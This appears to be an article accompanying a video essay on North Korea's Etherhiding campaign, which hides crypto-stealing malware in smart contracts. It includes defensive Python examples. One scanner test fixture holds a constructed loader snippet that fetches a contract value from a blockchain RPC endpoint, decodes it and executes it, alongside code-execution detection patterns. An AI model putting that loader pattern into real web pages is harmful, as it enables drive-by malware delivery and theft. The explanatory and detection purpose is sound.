Presented by Simon Whistler. Part of the Whistlerverse.

North Korea's Blockchain Attacks: How Pyongyang Weaponized Cryptocurrency for Nuclear Funding


How North Korean hackers hide malware in Ethereum smart contracts (Etherhiding) as part of a cryptocurrency theft program that now nets more than $2 billion a year, funding nuclear weapons while evading international sanctions.



Video originally published on November 8, 2025.

In October 2025, Google Threat Intelligence Group (GTIG) revealed a disturbing evolution in state-sponsored cybercrime: North Korean hackers tracked as UNC5342 have been using smart contracts on the Ethereum blockchain to host and deliver malware used to steal cryptocurrency. This marks the first time government-backed hackers have been observed using a technique called Etherhiding, which relies on the decentralized, tamper-resistant nature of a public blockchain to make the malware's hosting nearly impossible to take down and the victims' downloads nearly impossible to trace. The campaign, ongoing since February 2025, represents more than just technological innovation. It is a lifeline for a regime strangled by international sanctions: stolen cryptocurrency funds North Korea's nuclear weapons program while projecting power in a domain where Pyongyang's conventional military weaknesses become irrelevant.

Key Takeaways

  • North Korean hackers have stolen over $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP, with cumulative thefts exceeding $6 billion since the program's inception.
  • The hacking group UNC5342 is using Etherhiding, a technique that stores malicious code in smart contracts on the Ethereum blockchain, so the payload is replicated on every node that holds a copy of the chain and cannot be seized or shut down like an ordinary hosting server.
  • According to the Multilateral Sanctions Monitoring Team, these stolen funds directly finance North Korea's nuclear weapons research and development.
  • Kim Jong Un has declared cyber warfare a 'magic weapon' alongside nuclear weapons and missiles, with South Korean estimates indicating North Korea operates approximately 6,000 cyber warfare troops.
  • This represents a fundamental shift in modern conflict, where cyberwarfare has evolved from a supplementary tool to a primary weapon for nations seeking to avoid physical combat while still projecting power and generating revenue.
  • The decentralized nature of blockchain technology makes these attacks exceptionally difficult to trace because victims' devices retrieve the malicious payload with read-only calls that leave no transaction on the chain; only the attackers' own updates to the contract are recorded, which makes the contract address the main handle defenders have.

Understanding Etherhiding: The Technical Foundation of North Korea's Attacks

To comprehend the significance of North Korea's blockchain exploitation, understanding the underlying technology is essential. A blockchain functions as an append-only digital ledger that records transactions across many computers simultaneously, operating like a massive shared spreadsheet that anyone can read but no one can alter once records are made. Transactions are grouped into blocks and linked together in a chain, hence the name. The revolutionary aspect of blockchain technology lies in its decentralization: no single entity controls it. Instead, thousands of computers worldwide maintain copies of the ledger, and cryptocurrencies emerged as rewards for the people who maintain it by verifying transactions and adding new blocks, through mining on proof-of-work chains such as Bitcoin or, on Ethereum since its 2022 switch to proof of stake, through staking.

The Ethereum blockchain, which serves as the platform for these North Korean attacks, includes a critical feature beyond basic transaction recording: smart contracts. These are programs that live on the blockchain and execute automatically when certain conditions are met. They function autonomously once deployed, similar to vending machines that dispense products when sufficient payment is inserted. North Korean hackers weaponized this feature by storing malware, in encoded form, inside a smart contract's storage. When a victim's browser loads a compromised website, or the victim runs a file downloaded from one, code on the device silently queries the blockchain, retrieves the encoded payload from the smart contract, decodes it and executes it, installing malware. The hackers then gain access to the victim's data and cryptocurrency holdings.
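An added example, not code from the original page, from Google's report or from the campaign itself, showing the kind of check a web team could run over scripts served from its own pages to catch the loader pattern just described. The two script snippets are constructed for the example (the contract address in the second one is the zero address as a placeholder), and the indicator lists are assumptions of this example rather than a published signature set:

```python
import re

# Constructed sample scripts for illustration; neither is a real sample from
# the campaign, and the contract address below is the zero address, a placeholder.
BENIGN_DAPP = """
const provider = new ethers.JsonRpcProvider("https://mainnet.infura.io/v3/KEY");
const token = new ethers.Contract(TOKEN_ADDR, ERC20_ABI, provider);
async function refresh() { balance.textContent = await token.balanceOf(user); }
"""

INJECTED_LOADER = """
(async()=>{const p=new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");
const c=new ethers.Contract("0x0000000000000000000000000000000000000000",
  ["function get() view returns (string)"],p);
const s=await c.get();new Function(atob(s))();})();
"""

INDICATORS = {
    # Reads contract state: normal for any dapp front-end, so never sufficient alone.
    "chain_read": [r"\beth_call\b", r"ethers\.Contract\(", r"web3\.eth\.Contract\(", r"view returns"],
    # Turns data into code: the defining step of a loader.
    "dynamic_exec": [r"\beval\(", r"\bnew Function\(", r"document\.write\(",
                     r"createElement\(['\"]script['\"]\)", r"\.innerHTML\s*="],
    # Unwraps an encoded payload first: raises confidence, not required.
    "decode": [r"\batob\(", r"fromCharCode", r"toUtf8String\(", r"hexToString\("],
}


def scan_script(src):
    """Return (verdict, matched indicator categories, contract addresses, RPC endpoints)."""
    hits = {cat: [p for p in pats if re.search(p, src)] for cat, pats in INDICATORS.items()}
    hits = {cat: pats for cat, pats in hits.items() if pats}
    # Anything that looks like a contract address or an RPC URL is worth sharing as an IoC.
    addresses = sorted(set(re.findall(r"0x[0-9a-fA-F]{40}", src)))
    endpoints = sorted(set(re.findall(r"https?://[^\s\"'()]+", src)))
    # A legitimate dapp reads contracts; a loader reads a contract and then
    # executes what came back. Requiring both keeps ordinary dapps out.
    if {"chain_read", "dynamic_exec"}.issubset(hits):
        verdict = "etherhiding-loader"
    else:
        verdict = "benign"
    return verdict, hits, addresses, endpoints


if __name__ == "__main__":
    for name, src in (("benign dapp", BENIGN_DAPP), ("injected loader", INJECTED_LOADER)):
        verdict, hits, addrs, eps = scan_script(src)
        print(f"{name}: {verdict} hits={sorted(hits)} contracts={addrs} rpc={eps}")
```

The benign snippet trips the chain-read indicators and nothing else, which is exactly why a single indicator is not a verdict; the loader trips read, decode and execute together. In practice the same scan belongs in a CI check over every script the site serves and in a periodic fetch of the live pages, since the injection lands on the deployed site, not in the repository.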

From the attacker's perspective, this approach offers elegant advantages. The malicious code isn't stored on a server that law enforcement can locate and shut down; it exists on the blockchain itself, replicated on thousands of nodes globally. Immutability applies to a contract's code, not to its storage: the attacker cannot rewrite the deployed program, but can replace the payload it serves with a cheap transaction to a setter function, or can route victims through an upgradeable proxy contract that points at a new implementation. Either way the malware can be swapped at will without touching the compromised websites. The remaining chokepoints are the compromised sites that carry the loader and the public RPC endpoints the loader queries, both of which can be cleaned or blocked; the payload's storage itself cannot. Etherhiding first emerged in 2023 and has been in use since, but the October announcement marked the first observation of government-backed hackers employing this method.

The technique proves exceptionally difficult to track and stop for two primary reasons. First, most blockchain users operate under pseudonyms, limiting the ability to verify identities; even casual observers of cryptocurrency likely recognize Satoshi Nakamoto, Bitcoin's pseudonymous creator. Second, the victim's device retrieves the malicious payload with a read-only call (eth_call on Ethereum), which is answered by whichever node the device asks and is never written to the chain, so the ledger holds no record of who fetched the payload or when, functioning like an untraceable burner phone used to detonate a bomb without leaving evidence for investigators. What the ledger does record is every update the attacker makes to the contract, which is why monitoring a known malicious contract address is the most reliable way to recover each payload version. The fact that North Korean hacking groups have adopted and refined this technique suggests they are improving their capabilities at a staggering rate, with Western targets clearly in their sights.
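An added example, not from the original page, from Google's report or from the campaign, that models in Python the three points made above: the payload sits in contract storage, the attacker rotates it with transactions, and victims fetch it with read-only calls that leave no record. `ToyChain`, `SET_SELECTOR`, the sender labels and the payload strings are constructed placeholders (a real selector is the first four bytes of keccak256 of the setter's signature); the ABI layout of a `string` return value is the real Ethereum encoding that a loader or an analyst has to decode:

```python
from dataclasses import dataclass, field

# Placeholder 4-byte function selector for the contract's setter. A real one is
# the first four bytes of keccak256 of the signature (e.g. "set(string)");
# this value is a constructed stand-in, not a real selector.
SET_SELECTOR = "deadbeef"


def abi_encode_string(s):
    """ABI-encode one dynamic `string` the way eth_call returns it: a 32-byte
    offset (0x20), a 32-byte length, then the UTF-8 bytes right-padded to a
    32-byte boundary."""
    data = s.encode()
    padded = data + b"\x00" * (-len(data) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(data).to_bytes(32, "big").hex() + padded.hex()


def abi_decode_string(hexdata):
    """Inverse of abi_encode_string: the decoding the injected loader (or an
    analyst reading calldata) performs on the raw hex."""
    raw = bytes.fromhex(hexdata[2:])
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode()


@dataclass
class Tx:
    block: int
    sender: str
    to: str
    input_data: str


@dataclass
class ToyChain:
    """Minimal model of an EVM chain: per-contract storage plus the transaction
    log every full node keeps. Writes go through send_transaction and are
    mined; eth_call reads local state and is never broadcast."""
    storage: dict = field(default_factory=dict)
    owners: dict = field(default_factory=dict)
    txs: list = field(default_factory=list)
    height: int = 0

    def deploy(self, contract, owner, payload):
        self.owners[contract] = owner
        return self.send_transaction(owner, contract, payload)

    def send_transaction(self, sender, contract, new_payload):
        # The contract code is immutable, but the storage slot it reads is not.
        # An Etherhiding contract exposes an owner-only setter; every call to it
        # is a transaction, paid for in gas and recorded forever.
        if self.owners.get(contract) != sender:
            raise PermissionError("setter is onlyOwner")
        self.height += 1
        self.storage[contract] = new_payload
        calldata = "0x" + SET_SELECTOR + abi_encode_string(new_payload)[2:]
        self.txs.append(Tx(self.height, sender, contract, calldata))
        return self.height

    def eth_call(self, contract):
        # Read-only: answered by whichever RPC node the victim asks, from that
        # node's copy of state. Nothing is mined, so the chain holds no record
        # of who fetched the payload or when.
        return abi_encode_string(self.storage[contract])


def run_scenario():
    """Attacker deploys and later rotates the payload; a victim fetches in
    between; the defender rebuilds every payload version from the contract's
    write history. All labels and payload strings are constructed placeholders."""
    chain = ToyChain()
    attacker, contract = "attacker-eoa", "payload-contract"
    chain.deploy(contract, attacker, "loader-v1 (placeholder, not real malware)")

    writes_before = len(chain.txs)
    victim_got = abi_decode_string(chain.eth_call(contract))
    read_left_a_trace = len(chain.txs) != writes_before

    chain.send_transaction(attacker, contract, "loader-v2 (placeholder, not real malware)")

    # Defender's handle: the reads are invisible, but every payload change is a
    # transaction to a known address whose calldata can be decoded offline.
    history = [
        (t.block, abi_decode_string("0x" + t.input_data[2 + len(SET_SELECTOR):]))
        for t in chain.txs
        if t.to == contract and t.input_data[2:2 + len(SET_SELECTOR)] == SET_SELECTOR
    ]
    return {"victim_got": victim_got, "read_left_a_trace": read_left_a_trace, "history": history}


if __name__ == "__main__":
    print(run_scenario())
```

The victim's fetch changes nothing on the chain, while each of the attacker's writes is a block-stamped record at a known address; against a real chain the same reconstruction is a filter on transactions to the contract address followed by ABI decoding of their calldata, which is how analysts pull every historical stage of an Etherhiding payload.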

The Economic Imperative: Why North Korea Turned to Cryptocurrency Theft

According to a 138-page report published by the Multilateral Sanctions Monitoring Team, a group established to observe North Korea's compliance with United Nations sanctions, the answer to why Pyongyang pursues these attacks is straightforward: money. The report found that North Korea uses funds obtained from these hacks to finance research and development of nuclear arms. Matthew Stern, CEO and Lead Investigator at CNC Intelligence Inc, an organization providing bespoke cybersecurity solutions, confirmed these findings in exclusive comments, stating that North Korea's adoption of Etherhiding extends its crypto theft strategy. For years, DPRK-linked threat actors have relied on mixers like Blender.io and Sinbad.io to obscure transaction trails after major exchange hacks. Now they are escalating by using the blockchain itself as part of their attacks. Their goal remains unchanged—converting stolen assets into hard currency for weapons programs—but the infrastructure they use for exploits has become far more resilient to disruption.

The scale of these thefts is staggering. According to investigators at the research firm Elliptic, North Korean hackers have stolen more than $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP. Cumulatively, they have stolen more than $6 billion since the program started. The fact that these proceeds constitute such a large percentage of North Korea's GDP indicates two critical realities: the exceptional skill of the hackers, and the devastating impact of international sanctions on the North Korean economy.

Research published in the journal Nature estimated that more than 60 percent of North Korea's population lives in absolute poverty, a situation where household income makes meeting basic needs impossible. According to the Borgen Project, a nonprofit working to end poverty, most workers in North Korea earn between $2 and $3 per month. The Korean Institute of America reports that the won lost more than half its value in a single year due to surging inflation. Kim Jong Un himself has acknowledged this economic reality, admitting that the government cannot provide even basic necessities such as foodstuffs, groceries, and consumer goods to its citizens.

These stark figures illustrate why North Korea has committed so heavily to hacking operations. They also suggest why stopping these activities may prove exceptionally difficult—for a regime facing economic collapse, cryptocurrency theft represents not merely an opportunity but an economic necessity. The sanctions designed to pressure North Korea into abandoning its nuclear program have instead created a desperate state willing to pursue increasingly sophisticated and aggressive cybercrime to survive.

Cyber Warfare as Power Projection: North Korea's Magic Weapon

Beyond immediate financial needs, North Korea pursues these attacks as a projection of Pyongyang's power. Apart from its nuclear arsenal, North Korea's conventional forces are unimpressive. Analysts believe that North Korea's weapons stockpiles are aging and ineffective, and their troops—while numerous—are reportedly so hungry that they sell their equipment to afford food. Because of crippling economic sanctions and the regime's choice to prioritize its nuclear program, Pyongyang has been unable to invest in its conventional military as desired.

In place of building conventional arms, North Korea chose cyberattacks, with Kim Jong Un declaring that cyber warfare is a "magic weapon" and an "all-purpose sword that guarantees the North Korean People's Armed Forces ruthless striking capability, along with nuclear weapons and missiles." The regime has invested substantially in this magic weapon. South Korean defense estimates indicate that North Korea operates approximately 6,000 cyber warfare troops. While this may seem modest compared to conventional troop numbers, hackers operate under fundamentally different conditions. They face no physical danger and can inflict substantial damage from great distances.

This strategic calculation has proven effective enough that former US Secretary of State Mike Pompeo claimed that North Korea poses a bigger threat than Russia when it comes to cyberattacks. This assessment underscores not only the significant threat North Korea poses but also the broader danger of cyberwarfare as a domain of conflict. For a nation with limited conventional military options, cyber capabilities offer asymmetric advantages that allow Pyongyang to punch far above its weight on the international stage. The cryptocurrency thefts simultaneously fund the nuclear program while demonstrating technical sophistication that commands respect and fear from more powerful adversaries.

The New Normal: Cyberwarfare as Primary Weapon

North Korea's blockchain attacks do not occur in isolation. These operations coincide with Russia ramping up hybrid warfare against Europe, combining cyberattacks with sophisticated disinformation campaigns such as those observed during recent elections in Moldova. Russian spy ships have been caught mapping undersea cables in the Irish Sea that could cripple internet and energy communications across Europe if severed during a crisis.

China operates its own version of this strategy, with the US government recently claiming that Beijing maintains a hacker-for-hire ecosystem generating tens of millions of dollars in revenue. Chinese hacking groups like Salt Typhoon and Volt Typhoon have infiltrated at least nine US telecommunications networks and gained control of hundreds of internet routers to use as launch pads for attacks on critical infrastructure. In Asia, Taiwan has borne the brunt of these attacks, with experts estimating it faced 2.4 million cyberattacks daily in 2024, double the previous year's rate.

The concerning aspect extends beyond mere scale. Former NSA head Tim Haugh warned that China is not targeting these systems for intelligence gathering or economic advantage, but to ensure leverage in a future conflict over Taiwan. If the situation escalates into armed conflict, Chinese strategists want Americans distracted by failing infrastructure at home—water treatment plants going offline, power grids failing, transportation networks collapsing. This represents the new normal in international conflict.

Cyberwarfare has evolved from a supplementary tool to a primary weapon for nations weary of engaging in physical combat. This fundamentally changes the calculus of deterrence. During the Cold War, the threat of mutually assured destruction kept nuclear powers in check. But cyberwarfare exists in a different realm where attribution is difficult, retaliation is complicated, and the rules of engagement remain unwritten. When North Korean hackers steal cryptocurrency, the classification remains ambiguous—is it an act of war, economic espionage, or simple theft? The answer depends on perspective, and that ambiguity makes cyberwarfare particularly attractive to rogue states.

The Limits of Response: Why Traditional Deterrence Fails

The international community possesses few effective tools to address North Korea's cryptocurrency theft operations. Additional sanctions would further crush the North Korean economy, paradoxically incentivizing the regime to pursue more aggressive hacking to compensate for the shortfall. Russia's current relationship with North Korea—receiving military support for its war effort—makes additional UN sanctions unlikely, as Moscow would probably veto such measures.

Military intervention remains out of the question for multiple reasons. It would appear as an overreaction to cyberattacks, and any country pursuing such action would struggle to secure international support despite the North Korean regime's unpopularity. Additionally, North Korea's nuclear stockpile functions as an ever-present deterrent. Any nation invading North Korea faces the near-certainty that Kim Jong Un would deploy nuclear weapons, making the costs of military action prohibitively high.

This strategic impasse leaves the international community in a difficult position. Traditional tools of statecraft—sanctions, diplomatic pressure, military deterrence—prove ineffective or counterproductive when applied to state-sponsored cybercrime. The decentralized nature of blockchain technology compounds these challenges, as the infrastructure hosting malicious code cannot be seized or shut down through conventional law enforcement methods. North Korea has effectively identified a domain where its weaknesses become irrelevant and its technical capabilities allow it to operate with relative impunity.

Building Defenses: International Cooperation and National Strategies

According to Matthew Stern, addressing these threats requires substantially more international cooperation. Financial intelligence units and agencies like the Financial Crimes Enforcement Network (FinCEN) and INTERPOL have improved tracing, freezing, and sanctions designations. However, what remains missing is a unified, rapid framework for identifying and suppressing on-chain malicious artifacts—such as wallet indicators of compromise and malicious contract addresses—across jurisdictions. While coordination by international law enforcement agencies has been critical, addressing threats like Etherhiding would benefit from a global database of malicious wallets. North Korea exploits time gaps in current systems, laundering stolen cryptocurrency through mixers, bridges, and over-the-counter brokers faster than existing cooperation models can respond.

While this proposal sounds promising in theory, it confronts the messy reality of international politics. Building a global database would require countries to willingly share intelligence about their vulnerabilities, which most nations understandably resist. The fear persists that today's friend could become tomorrow's enemy, and shared information might be weaponized against the sharing nation. Trust deficits between major powers make comprehensive information sharing exceptionally difficult to achieve.

Despite these challenges, international cooperation is advancing. NATO declared in 2016 that hybrid attacks against a member could lead to invoking Article 5, the collective defense provision. More recently, in 2022, NATO leaders endorsed comprehensive preventive and response options to counter hybrid threats that can be tailored to specific situations. The United Nations recently adopted the Convention against Cybercrime which, despite opposition from critics who decry its vague language, could facilitate international cooperation in enforcing cybercrime laws. At the time of the announcement, the treaty was not yet in effect, but a signing ceremony was scheduled for October 25-26, 2025, in Hanoi, Vietnam. After this ceremony, individual UN members would decide internally whether to ratify the treaty. It requires ratification by at least 40 nations before entering into force.

Beyond international cooperation, governments are developing their own defensive plans. In the United States, the Cybersecurity and Infrastructure Security Agency (CISA) developed a strategic plan to address attacks and reduce vulnerabilities in key infrastructure. The National Guard introduced a pilot program to strengthen local defenses against cyberattacks. In Europe, Ukraine recently strengthened its cybersecurity framework to guard against Russian aggression, learning hard lessons from years of sustained cyber operations against its infrastructure.

While all these measures are necessary, they cannot eliminate the threat entirely. As long as vulnerabilities remain, malicious actors will find ways to exploit them—this is simply the nature of security challenges. What these measures accomplish is making attacks more difficult, more costly, and more likely to fail. When attacks do succeed, the measures ensure that damage is contained and recovery is swift. In the evolving landscape of cyberwarfare, where complete prevention remains impossible, resilience and rapid response become the realistic goals of defensive strategy.


FAQ

What is Etherhiding and how does it work?

Etherhiding is a technique where hackers hide malicious code, in encoded form, in the storage of a smart contract on the Ethereum blockchain. When a victim's browser loads a compromised website, or the victim runs a file downloaded from one, code on the device silently queries the blockchain, retrieves the encoded payload from the smart contract, decodes it and executes it, installing malware. The malicious code isn't stored on a server that can be shut down; it exists on the blockchain itself, replicated on thousands of nodes globally. Victims retrieve the payload with read-only calls that leave no transaction on the chain, while the attackers can swap the payload with a cheap transaction, which is the one part of the scheme that does leave a record.

How much cryptocurrency has North Korea stolen and what do they use it for?

According to investigators at the research firm Elliptic, North Korean hackers have stolen more than $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP. Cumulatively, they have stolen more than $6 billion since the program started. According to the Multilateral Sanctions Monitoring Team, North Korea uses these stolen funds to finance research and development of nuclear arms.

Why is North Korea so heavily invested in cryptocurrency theft?

North Korea pursues cryptocurrency theft for two primary reasons: economic necessity and power projection. International sanctions have devastated the North Korean economy, with more than 60 percent of the population living in absolute poverty and most workers earning $2 to $3 per month. The stolen cryptocurrency provides crucial funding for the regime. Additionally, Kim Jong Un has declared cyber warfare a 'magic weapon' alongside nuclear weapons and missiles, allowing North Korea to project power despite its weak conventional military forces.

Is this the first time government-backed hackers have used Etherhiding?

Yes. While Etherhiding first emerged in 2023 and has been in use since, the October 2025 announcement by Google Threat Intelligence Group marked the first observation of government-backed hackers employing this method. This suggests that North Korean hacking groups are improving their capabilities at a staggering rate.

Why can't traditional methods like sanctions or military intervention stop these attacks?

Traditional deterrence methods prove ineffective for several reasons. Additional sanctions would further crush the North Korean economy, paradoxically incentivizing the regime to pursue more aggressive hacking to compensate for the shortfall. Russia's current relationship with North Korea makes additional UN sanctions unlikely, as Moscow would probably veto such measures. Military intervention remains out of the question because it would appear as an overreaction and any nation invading North Korea faces the near-certainty that Kim Jong Un would deploy nuclear weapons.

How many cyber warfare troops does North Korea operate?

South Korean defense estimates indicate that North Korea operates approximately 6,000 cyber warfare troops. While this may seem modest compared to conventional troop numbers, hackers operate under fundamentally different conditions—they face no physical danger and can inflict substantial damage from great distances.

What defensive measures are being implemented against these attacks?

Defensive measures include both international cooperation and national strategies. NATO declared in 2016 that hybrid attacks against a member could lead to invoking Article 5, and in 2022 endorsed comprehensive preventive and response options. The UN recently adopted the Convention against Cybercrime to facilitate international cooperation. In the United States, CISA developed a strategic plan to address attacks and reduce vulnerabilities, while the National Guard introduced a pilot program to strengthen local defenses. In Europe, Ukraine recently strengthened its cybersecurity framework to guard against Russian aggression.

What is a blockchain and how does it relate to these attacks?

A blockchain is an append-only digital ledger that records transactions across many computers simultaneously, operating like a massive shared spreadsheet that anyone can read but no one can alter once records are made. The Ethereum blockchain includes smart contracts, programs that live on the blockchain and execute automatically when certain conditions are met. North Korean hackers weaponized this feature by hiding malware within smart contracts, taking advantage of the blockchain's decentralized nature to make their payload hosting nearly impossible to shut down.


About the Author

Wilfred M. Waimiri

Wilfred M. Waimiri creates and presents analysis focused on military doctrine, strategic competition, and conflict dynamics.
